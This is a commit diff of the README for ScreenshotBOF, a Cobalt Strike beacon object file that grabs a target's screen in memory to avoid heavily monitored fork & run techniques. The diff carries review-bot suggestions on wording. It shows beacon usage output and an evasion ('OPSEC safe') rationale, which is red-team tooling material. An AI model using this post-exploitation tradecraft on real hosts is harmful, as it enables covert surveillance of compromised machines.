ScreenshotBOF, commit 7e0ee92c
    README.md
    1 1  # ScreenshotBOF
    2 2   
    3  -An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
     3 +An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.
    4 4   
    5 5  ## Self Compilation
    6 6  1. git clone the repo
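Review bot: the new line 3 ends in a fragment, "Screenshot downloaded in memory.", and it replaces a sentence that said the opposite ("Screenshot saved to disk as a file"), so a reader cannot tell from the description alone whether the target's disk is still touched. Suggest a full sentence that states the behaviour explicitly, for example "The screenshot is transferred back over the beacon in memory instead of being written to a file on the target." if that is what the change does; the disk-versus-memory distinction is the main thing someone evaluating this README will look for.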
    skipped 2 lines
    9 9   
    10 10  ## Usage
    11 11  1. import the screenshotBOF.cna script into Cobalt Strike
    12  -2. use the command screenshot_bof
    13  -3. Download the screenshot from the target
     12 +2. use the command screenshot_bof {local filename}
    14 13  ```
    15  -beacon> screenshot_bof
     14 +beacon> screenshot_bof sad.bmp
    16 15  [*] Running screenshot BOF by (@codex_tf2)
    17  -[+] host called home, sent: 3411 bytes
     16 +[+] host called home, sent: 4860 bytes
    18 17  [+] received output:
    19  -[*] Tasked beacon to printscreen and save to disk
     18 +[*] Tasked beacon to printscreen and save to sad.bmp
    20 19  [+] received output:
    21 20  [+] PrintScreen saved to bitmap...
    22  -[+] received output:
    23  -[+] Printscreen bitmap saved to screenshot.bmp
    24  -beacon> download screenshot.bmp
    25  -[*] Tasked beacon to download screenshot.bmp
    26  -[+] host called home, sent: 22 bytes
    27  -[*] started download of C:\screenshot.bmp (12441668 bytes)
    28  -[*] download of screenshot.bmp is complete
     21 +[*] started download of sad.bmp
    29 22  ```
    30 23   
    31 24  ## Notes
    32 25  - no evasion is performed, which should be fine since the WinAPIs used are not malicious
    33  -- in memory downloading of screenshots is planned to be added
    34  -- the filename can be changed in the source code.
    35 26   
    36 27  ## Why did I make this?
    37 28  Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
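Review bot: the argument `{local filename}` in usage step 2 does not say which machine the path belongs to, and the example output `[*] Tasked beacon to printscreen and save to sad.bmp` reads as though the beacon writes sad.bmp on the target, which contradicts the new "downloaded in memory" description in the same commit. Suggest spelling out that the name is where the Cobalt Strike client stores the received bitmap, e.g. `2. use the command screenshot_bof {filename to save on the operator's client}`, and wording the tasking message to match, e.g. "Tasked beacon to printscreen, output will be downloaded to sad.bmp". Removing the old step 3 and the "filename can be changed in the source code" note is consistent with the new argument, so no further change is needed there.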
    skipped 1 lines
    39 30  ## Credits
    40 31  - Made using https://github.com/securifybv/Visual-Studio-BOF-template
    41 32  - Save BMP to file from https://stackoverflow.com/a/60667564
     33 +- in memory download from https://github.com/anthemtotheego/CredBandit
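Review bot: the new credits bullet starts lowercase ("in memory download from") while the two existing bullets start with a capital and name what was borrowed ("Made using", "Save BMP to file from"); suggest `- In-memory download based on https://github.com/anthemtotheego/CredBandit` for consistency.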